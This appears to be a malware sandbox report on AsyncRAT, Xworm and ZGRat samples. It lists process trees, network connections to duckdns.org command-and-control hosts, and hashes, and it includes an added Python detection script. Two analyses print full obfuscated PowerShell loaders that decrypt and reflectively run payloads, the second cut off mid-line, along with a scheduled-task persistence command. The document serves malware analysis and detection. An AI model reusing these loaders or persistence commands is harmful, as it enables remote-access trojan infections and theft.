| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/3604-0-0x0000013AFAFE0000-0x0000013AFB002000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4zvze4pc.cwp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3604-10-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3604-11-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-12-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-13-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3604-14-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-15-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-16-0x0000013A90600000-0x0000013A90654000-memory.dmp
memory/3604-17-0x0000013A906B0000-0x0000013A90704000-memory.dmp
memory/3440-18-0x00000135D0C70000-0x00000135D0C80000-memory.dmp
memory/3440-19-0x00000135D28A0000-0x00000135D28B0000-memory.dmp
memory/3440-20-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3440-21-0x00000135EB320000-0x00000135EB330000-memory.dmp
memory/3440-22-0x00000135EB320000-0x00000135EB330000-memory.dmp
memory/3604-25-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3604-26-0x0000013A906B0000-0x0000013A90704000-memory.dmp
memory/3440-27-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3440-28-0x00000135EB320000-0x00000135EB330000-memory.dmp
memory/3440-29-0x00000135EB320000-0x00000135EB330000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
158s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 52.111.229.43:443 | | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
Files
memory/3676-0-0x000001C4FD590000-0x000001C4FD5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orbceapg.1ev.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3676-10-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3676-12-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-11-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-13-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-14-0x000001C500000000-0x000001C500044000-memory.dmp
memory/3676-15-0x000001C500050000-0x000001C5000C6000-memory.dmp
memory/3292-25-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3292-26-0x0000028E360B0000-0x0000028E360C0000-memory.dmp
memory/3292-29-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3676-30-0x000001C498020000-0x000001C498034000-memory.dmp
memory/3676-31-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
memory/3676-32-0x00007FFD39950000-0x00007FFD39A0E000-memory.dmp
memory/3676-33-0x000001C4982F0000-0x000001C498300000-memory.dmp
memory/3676-34-0x000001C498300000-0x000001C498316000-memory.dmp
memory/3676-35-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
memory/3676-37-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3676-38-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-39-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-40-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-41-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
91s
Max time network
156s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2360 set thread context of 5072 | N/A | C:\Users\Admin\AppData\Local\Temp\fresh.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fresh.exe
"C:\Users\Admin\AppData\Local\Temp\fresh.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"
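Every analysis in this report reduces to a few process-creation and connection patterns: RegAsm.exe started with no arguments by an executable in %TEMP% and then written to via SetThreadContext (this analysis), a scheduled task firing every 10 minutes on a copy of the dropper in %TEMP%, cmd.exe and WScript.exe spawning hidden PowerShell with base64/gzip loaders on the command line, and TCP sessions to duckdns.org names on ports 8890, 8895 and 8896. The Python below is an added example, not part of the report: it encodes those patterns as checks over process events shaped like the process lists here and over the Network tables as printed. Event rows are copied from this report except where marked: the parent of the payload.ps1 PowerShell is assumed, the WScript and inline-loader command lines are abbreviated, and the %TEMP% and port heuristics are this example's own thresholds.

```python
import re
from dataclasses import dataclass

# Added example, not part of the sandbox report: the report's process trees and
# Network tables reduced to checks that run over process-creation telemetry
# (Sysmon event 1 / EDR) and connection logs of the same shape.

@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden")

def triage_process(ev: ProcEvent) -> list[str]:
    """Names of every pattern from this report that the event matches."""
    hits = []
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline
    low = cmd.lower()
    if image.endswith("powershell.exe"):
        if HIDDEN_RE.search(low) and parent.endswith("cmd.exe"):
            hits.append("hidden PowerShell launched from a batch file")
        if "-executionpolicy bypass" in low and "-file" in low and TEMP_RE.search(cmd):
            hits.append("ExecutionPolicy bypass running a script from %TEMP%")
        if parent.endswith("wscript.exe"):
            hits.append("PowerShell spawned by WScript.exe")
        if "frombase64string" in low and "gzipstream" in low:
            hits.append("inline base64+gzip assembly loader on the command line")
    elif image.endswith("schtasks.exe") and "/create" in low:
        target = re.search(r"/tr\s+\"?'?([^\"']+)", cmd, re.I)
        if target and TEMP_RE.search(target.group(1)):
            hits.append("scheduled task persistence pointing into %TEMP%")
    elif (image.endswith("regasm.exe") and TEMP_RE.search(ev.parent)
          and low.strip().strip('"').endswith("regasm.exe")):
        hits.append("RegAsm.exe with no arguments from a %TEMP% parent (hollowing target)")
    return hits

DDNS_SUFFIXES = ("duckdns.org",)  # dynamic-DNS provider behind every C2 name in this report
EXPECTED_PORTS = {53, 80, 443}    # example's own threshold: anything else is "non-standard"

def parse_network_rows(table_text: str) -> list[tuple[str, str, str, str]]:
    """Parse '| Country | Destination | Domain | Proto |' rows as printed in this report."""
    rows = []
    for line in table_text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 4 and cells[0] != "Country":
            rows.append(tuple(cells))
    return rows

def c2_candidates(rows) -> list[tuple[str, str, int]]:
    """TCP sessions to a dynamic-DNS name on a port that is not DNS, HTTP or HTTPS."""
    found = set()
    for _country, dest, domain, proto in rows:
        host, _, port = dest.rpartition(":")
        if (proto == "tcp" and port.isdigit() and int(port) not in EXPECTED_PORTS
                and domain.endswith(DDNS_SUFFIXES)):
            found.add((domain, host, int(port)))
    return sorted(found)

# Events taken from the process lists in this report (parent, child, command line).
# "assumed" / "<abbreviated>" mark what the report does not show verbatim.
REPORT_EVENTS = [
    ProcEvent(r"C:\Windows\system32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden'),
    ProcEvent(r"C:\Windows\Explorer.EXE",  # assumed parent
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy bypass -File "
              r"C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\SysWOW64\schtasks.exe",
              r'''schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f'''),
    ProcEvent(r"C:\Users\Admin\AppData\Local\Temp\fresh.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    ProcEvent(r"C:\Windows\System32\WScript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = <abbreviated>"'),
    ProcEvent(r"C:\Windows\system32\cmd.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -WindowStyle hidden -command "[System.Convert]::FromBase64String($x); '
              r'New-Object System.IO.Compression.GzipStream <abbreviated>"'),
    ProcEvent(r"C:\Windows\Explorer.EXE",
              r"C:\Windows\System32\notepad.exe",
              r"C:\Windows\System32\notepad.exe"),  # benign control from the analysis above
]

# Rows copied from the Network tables in this report.
REPORT_NETWORK_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 57.128.155.22:8895 | jdokds.duckdns.org | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
"""

if __name__ == "__main__":
    for ev in REPORT_EVENTS:
        print(ev.image.rsplit("\\", 1)[-1], "->", triage_process(ev) or "no hit")
    print(c2_candidates(parse_network_rows(REPORT_NETWORK_ROWS)))
```

The RegAsm rule is deliberately narrow (no arguments, parent under %TEMP%): a legitimate RegAsm invocation always carries an assembly path, and the SetThreadContext signature above shows why an argument-less copy spawned by fresh.exe is a hollowing target rather than a registration.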
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/2360-0-0x00000000008A0000-0x00000000008CE000-memory.dmp
memory/2360-1-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/2360-2-0x0000000005210000-0x0000000005220000-memory.dmp
memory/2360-3-0x0000000005290000-0x00000000052F6000-memory.dmp
memory/2360-4-0x00000000058B0000-0x0000000005E54000-memory.dmp
memory/5072-5-0x0000000000400000-0x0000000000410000-memory.dmp
memory/5072-6-0x00000000051F0000-0x000000000528C000-memory.dmp
memory/5072-7-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/2360-11-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/5072-12-0x0000000005450000-0x0000000005460000-memory.dmp
memory/5072-13-0x0000000005B00000-0x0000000005B92000-memory.dmp
memory/5072-14-0x0000000005AA0000-0x0000000005AAA000-memory.dmp
memory/5072-15-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/5072-16-0x0000000005450000-0x0000000005460000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:51
Platform
win10v2004-20240412-en
Max time kernel
77s
Max time network
92s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object 